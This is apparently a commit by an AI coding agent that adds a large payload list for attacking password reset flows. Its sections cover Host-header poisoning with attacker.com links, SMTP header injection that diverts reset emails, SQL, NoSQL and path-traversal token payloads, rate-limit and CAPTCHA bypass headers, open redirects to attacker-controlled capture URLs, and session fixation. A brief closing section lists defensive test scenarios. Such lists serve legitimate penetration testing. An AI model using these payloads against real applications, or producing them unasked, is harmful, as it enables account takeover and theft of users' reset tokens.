Add comprehensive password reset vulnerability payloads and PoC documentation

Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
copilot-swe-agent[bot]
2026-01-05 15:32:01 +00:00
parent 79f39287b7
commit 2c30b71106
5 changed files with 1062 additions and 0 deletions
+590
@@ -0,0 +1,590 @@
# Password Reset Vulnerability Payloads
# ============================================
# 1. HOST HEADER INJECTION PAYLOADS
# ============================================
# Basic host header manipulation
Host: attacker.com
Host: evil.com
Host: attacker.com:80
Host: localhost
# X-Forwarded headers
X-Forwarded-Host: attacker.com
X-Forwarded-Host: evil.com
X-Forwarded-Server: attacker.com
X-Host: attacker.com
X-Forwarded-For: attacker.com
# Absolute URL in Host header
Host: https://attacker.com
Host: http://evil.com/reset
# Host header with port manipulation
Host: example.com:@attacker.com
Host: example.com@attacker.com
Host: example.com%00.attacker.com
Host: example.com%0d%0aHost:%20attacker.com
# Multiple host headers
Host: example.com
Host: attacker.com
# Host header with path
Host: example.com/reset
Host: attacker.com/../example.com
# ============================================
# 2. PARAMETER POLLUTION PAYLOADS
# ============================================
# Multiple email parameters
email=victim@example.com&email=attacker@example.com
email[]=victim@example.com&email[]=attacker@example.com
email=victim@example.com,attacker@example.com
email=victim@example.com%20attacker@example.com
email=victim@example.com|attacker@example.com
email=victim@example.com;attacker@example.com
# Email with CC/BCC injection
email=victim@example.com%0Acc:attacker@example.com
email=victim@example.com%0Abcc:attacker@example.com
email=victim@example.com%0D%0ACC:attacker@example.com
email=victim@example.com%0d%0aBcc:attacker@example.com
# JSON array pollution
{"email": ["victim@example.com", "attacker@example.com"]}
{"email": "victim@example.com", "email": "attacker@example.com"}
# Multiple parameters with different names
email=victim@example.com&mail=attacker@example.com
email=victim@example.com&username=attacker
to=victim@example.com&cc=attacker@example.com
# ============================================
# 3. TOKEN MANIPULATION PAYLOADS
# ============================================
# Empty token
token=
token=%20
token=null
token=undefined
token=0
# Boolean bypass
token=true
token=false
token=1
token=0
# Array manipulation
token[]=valid_token
token[]=
token[0]=valid_token
# SQL injection in token
token=' OR '1'='1
token=1' OR '1'='1'--
token=' OR 1=1--
token=admin'--
token='; DROP TABLE tokens;--
# NoSQL injection in token
{"token": {"$gt": ""}}
{"token": {"$ne": null}}
{"token": {"$regex": ".*"}}
# Path traversal in token
token=../../../../../../etc/passwd
token=....//....//....//etc/passwd
token=..%2F..%2F..%2Fetc%2Fpasswd
# Token with special characters
token=<script>alert(1)</script>
token=javascript:alert(1)
token=%00
token=%0d%0a
# Wildcard token
token=*
token=%
token=.*
token=.+
# ============================================
# 4. USER IDENTIFIER MANIPULATION (IDOR)
# ============================================
# User ID manipulation
user_id=1
user_id=2
user_id=admin
user_id=0
user_id=-1
user_id=999999
# Username manipulation
username=admin
username=administrator
username=root
username=victim
# Email manipulation
email=admin@example.com
email=admin@localhost
email=root@localhost
# UUID manipulation
user_uuid=00000000-0000-0000-0000-000000000001
user_uuid=11111111-1111-1111-1111-111111111111
# Account ID variations
account_id=1&user_id=2
uid=admin
user=admin
# ============================================
# 5. RATE LIMITING BYPASS PAYLOADS
# ============================================
# IP header spoofing
X-Forwarded-For: 1.2.3.4
X-Forwarded-For: 127.0.0.1
X-Real-IP: 1.2.3.4
X-Originating-IP: 1.2.3.4
X-Remote-IP: 1.2.3.4
X-Remote-Addr: 1.2.3.4
X-Client-IP: 1.2.3.4
# Randomized IPs for each request
X-Forwarded-For: <random_ip>
X-Real-IP: 192.168.1.<1-255>
# Multiple IP headers
X-Forwarded-For: 1.1.1.1, 2.2.2.2, 3.3.3.3
X-Forwarded-For: 127.0.0.1
X-Real-IP: 192.168.1.1
# Session manipulation
session_id=<different_session_each_request>
PHPSESSID=<random_session>
# User agent rotation
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
User-Agent: Mozilla/5.0 (X11; Linux x86_64)
# ============================================
# 6. WEAK TOKEN PATTERNS TO BRUTE FORCE
# ============================================
# 4-digit numeric codes
0000
0001
0002
...
9999
# 6-digit numeric codes (common OTP length)
000000
000001
...
999999
# Sequential tokens
token_1
token_2
token_3
# Timestamp-based tokens (Unix timestamp)
1609459200
1609459201
1609459202
# MD5 of simple inputs
5f4dcc3b5aa765d61d8327deb882cf99 (md5 of "password")
e10adc3949ba59abbe56e057f20f883e (md5 of "123456")
# Short alphanumeric (low entropy)
aaa
aab
aac
...
zzz
# Base64 encoded simple strings
YWRtaW4= (admin)
dGVzdA== (test)
MTIzNDU2 (123456)
# ============================================
# 7. RESPONSE MANIPULATION PAYLOADS
# ============================================
# These are used in client-side manipulation
{"valid": false} -> {"valid": true}
{"authenticated": false} -> {"authenticated": true}
{"error": "Invalid token"} -> {"success": "Token valid"}
{"status": 401} -> {"status": 200}
{"token_valid": false} -> {"token_valid": true}
# ============================================
# 8. ACCOUNT ENUMERATION PAYLOADS
# ============================================
# Valid vs invalid email testing
email=admin@example.com
email=administrator@example.com
email=test@example.com
email=nonexistent@example.com
email=invalid@invalid.invalid
# Username enumeration
username=admin
username=administrator
username=root
username=test
username=user
username=demo
username=guest
# Email format variations
email=admin
email=admin@
email=@example.com
email=admin@@example.com
email=admin@.com
# ============================================
# 9. EMAIL INJECTION PAYLOADS
# ============================================
# SMTP header injection
email=victim@example.com%0D%0ATo:attacker@evil.com
email=victim@example.com%0ABcc:attacker@evil.com
email=victim@example.com%0ASubject:Malicious
# Email with newline injection
email=victim@example.com%0A%0AAttacker content
email=victim@example.com\r\nBcc:attacker@evil.com
email=victim@example.com\nTo:attacker@evil.com
# Multiple recipients
email=victim@example.com,attacker@evil.com
email=victim@example.com;attacker@evil.com
email="victim@example.com, attacker@evil.com"
# ============================================
# 10. CRYPTO ANALYSIS PAYLOADS
# ============================================
# Test for weak encryption/encoding
token=base64_decode_this
token=rot13_this
token=hex_decode_this
# Known weak hashes to test
token=d41d8cd98f00b204e9800998ecf8427e (MD5 of empty string)
token=5d41402abc4b2a76b9719d911017c592 (MD5 of "hello")
# ============================================
# 11. TIME-BASED TESTING PAYLOADS
# ============================================
# Future timestamps
valid_until=9999999999
expires_at=2099-12-31
expiry=9999999999999
# Past timestamps (should be invalid)
timestamp=0
timestamp=1
created_at=1970-01-01
# ============================================
# 12. WORKFLOW BYPASS PAYLOADS
# ============================================
# Skip verification step
verified=true
email_verified=true
skip_verification=true
bypass=true
# Status manipulation
status=completed
status=verified
status=approved
password_reset_completed=true
# Step manipulation
step=1
step=3
skip_step=2
current_step=final
# ============================================
# 13. API-SPECIFIC PAYLOADS
# ============================================
# GraphQL mutations
{"query":"mutation{resetPassword(email:\"victim@example.com\"){success}}"}
{"query":"mutation{resetPassword(email:\"admin@example.com\",token:\""){success}}"}
# REST API variations
PUT /api/v1/users/1/password
PATCH /api/v1/password/reset
POST /api/reset
POST /api/v2/auth/forgot-password
# ============================================
# 14. SPECIAL CHARACTERS & ENCODING
# ============================================
# URL encoding
email=victim%40example.com
email=victim%2540example.com (double encoding)
# Unicode characters
email=victim@еxample.com (Cyrillic 'e')
email=admin@example.com
# Null bytes
email=victim@example.com%00
email=victim@example.com%00.attacker.com
token=valid_token%00
# HTML encoding
email=victim&#64;example.com
email=victim&commat;example.com
# ============================================
# 15. BUSINESS LOGIC BYPASS
# ============================================
# Negative values
user_id=-1
token_attempts=-1
rate_limit=-1
# Very large numbers
user_id=999999999
user_id=2147483647
user_id=9999999999999999999
# Array manipulation
user_id[]=1
user_id[]=2
emails[]=victim@example.com
# Type juggling
user_id="1"
user_id=1
user_id=true
user_id=null
# ============================================
# 16. CASE SENSITIVITY BYPASS
# ============================================
email=ADMIN@EXAMPLE.COM
email=Admin@Example.Com
username=ADMIN
username=AdMiN
token=ABCDEF
token=AbCdEf
# ============================================
# 17. LINK MANIPULATION
# ============================================
# Redirect after reset
redirect_url=https://attacker.com
return_url=https://evil.com
next=https://attacker.com/capture
callback=https://evil.com
# Open redirect in reset flow
redirect=//attacker.com
redirect=///attacker.com
redirect=/\/\attacker.com
redirect=//google.com@attacker.com
# ============================================
# 18. CORS & ORIGIN MANIPULATION
# ============================================
Origin: https://attacker.com
Origin: null
Referer: https://attacker.com/reset
Access-Control-Allow-Origin: *
# ============================================
# 19. RACE CONDITION PAYLOADS
# ============================================
# Send simultaneous requests
# Multiple threads requesting:
POST /reset-password with same token
POST /forgot-password for same email
POST /verify-token with same token
# ============================================
# 20. VERBOSE ERROR MESSAGES
# ============================================
# Test different invalid inputs to enumerate:
email=nonexistent@example.com
# Expected: "Email not found" (reveals valid emails)
token=invalid
# Expected: "Invalid token" vs "Expired token" (information disclosure)
user_id=9999
# Expected: "User does not exist" (user enumeration)
# ============================================
# 21. CAPTCHA BYPASS
# ============================================
captcha=
g-recaptcha-response=
h-captcha-response=
recaptcha_token=null
captcha_token=
skip_captcha=true
# ============================================
# 22. TWO-FACTOR BYPASS VIA PASSWORD RESET
# ============================================
# Test if password reset bypasses 2FA
skip_2fa=true
bypass_2fa=true
2fa_enabled=false
require_otp=false
mfa_required=false
# ============================================
# 23. PASSWORD CONFIRMATION BYPASS
# ============================================
# Missing confirmation field
new_password=NewPass123
# (without confirm_password field)
# Mismatched passwords
new_password=NewPass123
confirm_password=DifferentPass456
# Empty confirmation
new_password=NewPass123
confirm_password=
# ============================================
# 24. WEAK PASSWORD ALLOWED
# ============================================
# Test if weak passwords are accepted in reset
new_password=123
new_password=password
new_password=admin
new_password=123456
new_password=12345678
new_password=qwerty
new_password=abc123
# ============================================
# 25. SESSION FIXATION
# ============================================
# Set session before reset
Cookie: session_id=attacker_controlled_value
PHPSESSID=attacker_session
# After victim resets password with this session,
# attacker can use the session to access account
# ============================================
# 26. HTTP METHOD TAMPERING
# ============================================
# Try different HTTP methods on reset endpoint
GET /api/reset-password?token=abc&password=new
PUT /api/reset-password
DELETE /reset-password
PATCH /reset-password
HEAD /reset-password
OPTIONS /reset-password
# ============================================
# 27. CONTENT-TYPE MANIPULATION
# ============================================
Content-Type: application/json
Content-Type: application/x-www-form-urlencoded
Content-Type: multipart/form-data
Content-Type: text/plain
Content-Type: application/xml
# ============================================
# 28. PASSWORD IN RESPONSE
# ============================================
# Check if new password is returned in response
# After setting: new_password=SecretPass123
# Response should NOT contain:
{"password": "SecretPass123"}
{"new_password": "SecretPass123"}
# ============================================
# 29. NO CONFIRMATION EMAIL
# ============================================
# Test if user is notified after password reset
# User should receive confirmation that password was changed
# If not, attacker can silently reset passwords
# ============================================
# 30. TEMPORAL ATTACKS
# ============================================
# Timing attack to enumerate users
# Measure response time difference:
email=valid@example.com (slower response)
email=invalid@example.com (faster response)
# ============================================
# TEST SCENARIOS
# ============================================
# Scenario 1: Reset without current password
POST /change-password
new_password=NewPassword123
# Should require old_password field
# Scenario 2: Token reuse
1. Get token: /forgot-password?email=test@example.com
2. Use token: /reset?token=abc123&password=new1
3. Try token again: /reset?token=abc123&password=new2
# Second attempt should fail
# Scenario 3: Expired token
1. Get token
2. Wait > expiration time
3. Try to use expired token
# Should be rejected
# Scenario 4: Token for different user
1. Request reset for user A
2. Get token for user A
3. Try to use it for user B
# Should be rejected
# Scenario 5: Multiple active tokens
1. Request reset (get token1)
2. Request reset again (get token2)
3. Use token1
# token1 should still work, or only latest token should work